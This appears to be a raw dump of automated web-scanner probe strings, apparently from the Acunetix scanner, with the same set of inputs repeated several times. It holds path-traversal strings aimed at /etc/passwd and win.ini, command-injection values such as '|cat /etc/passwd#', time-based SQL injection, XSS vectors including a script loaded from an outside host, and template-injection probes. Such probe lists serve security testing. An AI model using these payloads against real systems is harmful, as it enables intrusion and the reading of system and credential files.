acu9616\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9616

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${99471+100215}

1

1

|cat /etc/passwd#

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

acux1448\xc0\xbez1\xc0\xbcz2a\x90bcxuca1448

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<ScRiPt >prompt(912212)</ScRiPt>

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

1

1&n976573=v993832

1

-1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<script>prompt(919357)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

WEB-INF/web.xml

-1)

testasp.vulnweb.com

1

1<ScRiPt >prompt(919406)</ScRiPt>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

'

1

1

!(()&&!|*|*|

WEB-INF\web.xml

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?919460></ScRiPt>

zbPQgZD7'

"

1

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

atILkNIT')

1

||cat /etc/passwd

1

1<ScRiPt >prompt(936688)</ScRiPt>

1

/etc/passwd

1

1

adDPtrh6'))

1

1<video><source onerror="javascript:prompt(948899)">

1

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

'&dir&'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974322)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'

-1)

"&dir&"

1<div style=width:expression(prompt(936026))>

1

1

1

-1))

1

"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

|dir

http://hitKtBcwrzXZj.bxss.me/

1<iframe src='data:text/html

BMeiH33E'

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1<body onload=prompt(978945)>

cRdndLjM')

'|dir

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949218)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

0okS2agH'))

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1<img src=xyz OnErRor=prompt(999415)>

comments

1

http://www.acunetix.tst

WEB-INF/web.xml

1

1

1

'"

1

comments/.

1

1<img/src=">" onerror=alert(933556)>

1

<!--

1'"()&%<ScRiPt >prompt(942267)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

1<ScRiPt%20>prompt(925388)</sCripT>

1

'"()&%<ScRiPt >prompt(924551)</ScRiPt>

1

1

1&lt

1

../../../../../../../../../../windows/win.ini

1

1

response.write(9207226*9314458)

1_943357

1

1

1

\xf6<img acu onmouseover=prompt(917076) //\xf6>

'+response.write(9207226*9314458)+'

1

1

1

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(948076)>

"+response.write(9207226*9314458)+"

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

1

[url=http://www.acunetix.com]website security[/url]

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1_ChjQo <ScRiPt >prompt(982414)</ScRiPt>

1

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

cat /etc/passwd

1

1

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

|cat /etc/passwd#

${100193+99437}

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

acu9545\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9545

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

acux2007\xc0\xbez1\xc0\xbcz2a\x90bcxuca2007

1

1&n942501=v982497

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(912980)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF\web.xml

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<script>prompt(911219)</script>

1

)

testasp.vulnweb.com

1

'

-1

1

1

1<ScRiPt >prompt(951480)</ScRiPt>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

-1)

1

1

"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917373></ScRiPt>

1

1

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

^(#$!@#$)(()))******

1

1<ScRiPt >prompt(926279)</ScRiPt>

7cCJDh6I'

||cat /etc/passwd

1

1

1

1

/etc/passwd

1<video><source onerror="javascript:prompt(983095)">

&dir

'"()

1

UQzomOGE')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961290)"></g></svg>

1

1

'&dir&'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1rWmP6Jn'))

1

1

1<div style=width:expression(prompt(915404))>

1

1

'

1

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

1<iframe src='data:text/html

"

1

1

http://hitoLp5HQ2nB8.bxss.me/

1

acunetix_wvs_invalid_filename

|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<body onload=prompt(989351)>

-1)

${@print(md5(acunetix_wvs_security_test))}

1

comments

'|dir

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(901456)>

-1))

1

comments/.

1

1

1

"|dir

http://www.acunetix.tst

1<img src=xyz OnErRor=prompt(971744)>

keJklD7V'

1

'"

file:///etc/passwd

1

1<img/src=">" onerror=alert(945510)>

1

1

qzEyC8rB')

1'"()&%<ScRiPt >prompt(934562)</ScRiPt>

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(972707)</sCripT>

1

g8P4ULLH'))

1

1

'"()&%<ScRiPt >prompt(949483)</ScRiPt>

1

1

1

WEB-INF/web.xml

1&lt

1

1

1

1_953590

response.write(9152361*9994389)

1

1

1

WEB-INF\web.xml

1

\xf6<img acu onmouseover=prompt(968471) //\xf6>

1

'+response.write(9152361*9994389)+'

1

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(997971)>

1

&cat /etc/passwd&

1

1

"+response.write(9152361*9994389)+"

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

1

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_pnUZA <ScRiPt >prompt(946518)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

................windowswin.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

..\..\..\..\..\..\..\..\windows\win.ini

|cat /etc/passwd#

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'|'ld

acu9132\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9132

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

acux7100\xc0\xbez1\xc0\xbcz2a\x90bcxuca7100

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99239+99385}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(913655)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(967803)</script>

1

-1)

1some_inexistent_file_with_long_name%00.jpg

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&n957976=v987314

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"

1

1<ScRiPt >prompt(923314)</ScRiPt>

1

WEB-INF/web.xml

1

/etc/passwd

testasp.vulnweb.com

NJAiDTLi'

||cat /etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962679></ScRiPt>

1

1

)

tVxRe5qX')

WEB-INF\web.xml

1

1

1

&dir

1

1<ScRiPt >prompt(900162)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

!(()&&!|*|*|

tbaHSIJR'))

1

1

1

1

1<video><source onerror="javascript:prompt(921428)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

-1

^(#$!@#$)(()))******

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988743)"></g></svg>

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

1

1

'"()

1<div style=width:expression(prompt(926469))>

1

1

1

-1))

1

|dir

1<iframe src='data:text/html

http://testasp.vulnweb.com/t/xss.html?%00.jpg

file:///etc/passwd

1

1

Cy2zOXFp'

'

1

'|dir

1

1<body onload=prompt(945394)>

1

1

http://hitmh14nyat8H.bxss.me/

"

fdL7tmMG')

1

/\../\../\../\../\../\../\../etc/passwd

1

acunetix_wvs_invalid_filename

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906951)>

${@print(md5(acunetix_wvs_security_test))}

6HPbmIoN'))

1

1

comments

1

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(970000)>

1

1

http://www.acunetix.tst

'"

comments

1

1<img/src=">" onerror=alert(934708)>

1

1

1'"()&%<ScRiPt >prompt(946519)</ScRiPt>

WEB-INF\web.xml

1

<!--

1<ScRiPt%20>prompt(942390)</sCripT>

comments/.

1

'"()&%<ScRiPt >prompt(964495)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1&lt

1

1_923968

1

1

1

../../../../../../../../../../boot.ini

\xf6<img acu onmouseover=prompt(902442) //\xf6>

1

1

response.write(9388775*9594275)

1

1

1

1<input autofocus onfocus=prompt(904955)>

1

'+response.write(9388775*9594275)+'

1

../../../../../../../../../../windows/win.ini.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

"+response.write(9388775*9594275)+"

1

&cat /etc/passwd&

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1_qIjWb <ScRiPt >prompt(972587)</ScRiPt>

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

|cat /etc/passwd#

acu1640\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1640

${100071+99017}

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

acux7445\xc0\xbez1\xc0\xbcz2a\x90bcxuca7445

1

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n934402=v986292

1<ScRiPt >prompt(960648)</ScRiPt>

1

"|"ld

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1some_inexistent_file_with_long_name%00.jpg

1

1<script>prompt(939786)</script>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(915409)</ScRiPt>

1

-1

)

testasp.vulnweb.com

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940236></ScRiPt>

-1)

1

'

!(()&&!|*|*|

WEB-INF\web.xml

1

-1))

1<ScRiPt >prompt(939606)</ScRiPt>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(939370)">

h27EWBP6'

1

1

1

||cat /etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985820)"></g></svg>

hYxcDnZC')

1

1

/etc/passwd

1

'"()

1

&dir

1

1

BOY7OI2H'))

1<div style=width:expression(prompt(915184))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

1

-1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<iframe src='data:text/html

1

'

"&dir&"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1<body onload=prompt(959575)>

"

acunetix_wvs_invalid_filename

-1))

http://hitQzFK0U5bqD.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

|dir

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970699)>

${@print(md5(acunetix_wvs_security_test))}

1

xtKgzVWB'

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<img src=xyz OnErRor=prompt(997395)>

jNbwqdas')

comments

'|dir

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

MYoodmsW'))

1

1

1<img/src=">" onerror=alert(933345)>

1

1

1

1

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1<ScRiPt%20>prompt(912342)</sCripT>

'"

1

1

1

WEB-INF/web.xml

1

<!--

1&lt

1

1

1

\xf6<img acu onmouseover=prompt(967433) //\xf6>

1

WEB-INF\web.xml

1

1

1

1

1

1'"()&%<ScRiPt >prompt(915826)</ScRiPt>

1<input autofocus onfocus=prompt(930832)>

1

response.write(9684515*9658490)

../../../../../../../../../../windows/win.ini

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(995717)</ScRiPt>

'+response.write(9684515*9658490)+'

&cat /etc/passwd&

1

1

../../../../../../../../../../boot.ini

[url=http://www.acunetix.com]website security[/url]

1

"+response.write(9684515*9658490)+"

1

'&cat /etc/passwd&'

1_936516

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1_RrHyP <ScRiPt >prompt(967798)</ScRiPt>

1

1

1

"&cat /etc/passwd&"

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

acu10119\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10119

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

${100444+99899}

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acux2668\xc0\xbez1\xc0\xbcz2a\x90bcxuca2668

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<ScRiPt >prompt(980628)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

1&n926977=v941770

-1

1<script>prompt(957746)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

"|"ld

1<ScRiPt >prompt(939187)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989983></ScRiPt>

testasp.vulnweb.com

1

-1))

1<ScRiPt >prompt(992950)</ScRiPt>

^(#$!@#$)(()))******

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<video><source onerror="javascript:prompt(962483)">

'"()

WEB-INF/web.xml

1

1

UBWD1cxQ'

1

1

/etc/passwd

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901105)"></g></svg>

1

WEB-INF\web.xml

zNxSvg2a')

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1<div style=width:expression(prompt(947805))>

1

1

PEDEnXeu'))

1

1

1

-1

1

1<iframe src='data:text/html

'

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<body onload=prompt(923012)>

1

1

"

-1))

1

acunetix_wvs_invalid_filename

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920576)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

1

x8ohFGsw'

comments

http://hitU9vvIQeSnG.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(982439)>

0RHJhW5Z')

comments

1

1

"&dir&"

1

hSatAbwu'))

1<img/src=">" onerror=alert(979195)>

comments/.

1

1

file:///etc/passwd

1

1

1<ScRiPt%20>prompt(955366)</sCripT>

1

|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

1

'|dir

\xf6<img acu onmouseover=prompt(940825) //\xf6>

http://www.acunetix.tst

1

'"

1

1'"()&%<ScRiPt >prompt(939888)</ScRiPt>

1

1

1<input autofocus onfocus=prompt(971393)>

1

WEB-INF\web.xml

"|dir

<!--

1

'"()&%<ScRiPt >prompt(944769)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

1_915101

1

1

1

response.write(9128115*9963528)

../../../../../../../../../../boot.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

'+response.write(9128115*9963528)+'

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9128115*9963528)+"

1_I8GbN <ScRiPt >prompt(906616)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

1

1

1

1

1

1

1

................windowswin.ini

1

1

1

"&cat /etc/passwd&"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../../../../../../../../../../etc/passwd.jpg

1

1

${100353+100163}

1

acu9379\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9379

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

acux9671\xc0\xbez1\xc0\xbcz2a\x90bcxuca9671

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(946529)</ScRiPt>

1

1&n990416=v991517

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1<script>prompt(935106)</script>

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF/web.xml

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(975017)</ScRiPt>

!(()&&!|*|*|

1

WEB-INF\web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

^(#$!@#$)(()))******

1

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960535></ScRiPt>

1

1

-1))

1

/etc/passwd

1<ScRiPt >prompt(985157)</ScRiPt>

testasp.vulnweb.com

"

'"()

1

uXuJhlmv'

1

1

1<video><source onerror="javascript:prompt(995469)">

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

rRjkRhps')

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905174)"></g></svg>

||cat /etc/passwd

1

1

kINoPtHn'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<div style=width:expression(prompt(953981))>

1

-1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1<iframe src='data:text/html

-1)

1

"

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1<body onload=prompt(985072)>

1

1

'&dir&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972382)>

KXV2IiSq'

${@print(md5(acunetix_wvs_security_test))}\

http://hiteoISPcdtBd.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

1<img src=xyz OnErRor=prompt(994676)>

afNCO5yn')

comments

1

1

1

1

file:///etc/passwd

"&dir&"

lP3HaVoR'))

1<img/src=">" onerror=alert(905547)>

comments

1

1

1

|dir

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(907291)</sCripT>

1

1

1

1

1

WEB-INF/web.xml

1

'|dir

1&lt

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'"

"|dir

WEB-INF\web.xml

1

\xf6<img acu onmouseover=prompt(948582) //\xf6>

<!--

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1<input autofocus onfocus=prompt(995702)>

1

1

1

response.write(9801189*9651157)

1'"()&%<ScRiPt >prompt(976631)</ScRiPt>

1

../../../../../../../../../../boot.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'+response.write(9801189*9651157)+'

'"()&%<ScRiPt >prompt(926403)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

1_943611

"+response.write(9801189*9651157)+"

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

1

1_01xW1 <ScRiPt >prompt(980762)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

